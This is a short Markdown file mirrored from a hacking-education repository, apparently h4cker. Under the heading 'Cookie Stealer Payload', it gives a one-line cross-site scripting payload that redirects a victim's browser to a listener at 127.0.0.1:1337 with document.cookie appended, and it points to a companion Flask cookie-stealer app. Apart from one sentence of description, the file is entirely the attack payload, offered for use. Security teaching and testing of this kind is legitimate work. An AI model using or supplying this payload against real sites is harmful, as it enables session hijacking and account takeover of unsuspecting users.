mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-10-01 01:25:43 -04:00
6 lines
322 B
Markdown
6 lines
322 B
Markdown
|
# Cookie Stealer Payload
|
||
|
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).
|
||
|
|
||
|
```
|
||
|
<script type=“text/javascript”>document.location=“http://127.0.0.1:1337/?c=“+document.cookie;</script>
|
||
|
```
|